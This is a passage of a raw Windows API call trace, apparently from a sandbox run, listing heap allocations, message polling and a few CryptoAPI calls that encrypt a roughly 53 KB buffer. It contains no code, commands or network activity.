hHeap=0x770000) returned 1 [0036.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da328 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd78 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.469] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.470] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0036.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.470] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0036.471] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.472] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0036.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.474] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.474] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.474] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.474] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.474] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.475] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0036.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.475] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.475] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.475] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.475] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.475] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.475] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.475] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.475] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.476] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.476] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.476] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xd05e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xd060) returned 1 [0036.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.476] CharLowerBuffW (in: lpsz="byte[53345]", cchLength=0xb | out: lpsz="byte[53345]") returned 0xb [0036.477] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.478] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.478] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.479] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x97c150*, pdwDataLen=0x6ae220*=0xd05e, dwBufLen=0xd060 | out: pbData=0x97c150*, pdwDataLen=0x6ae220*=0xd060) returned 1 [0036.479] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.479] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.479] 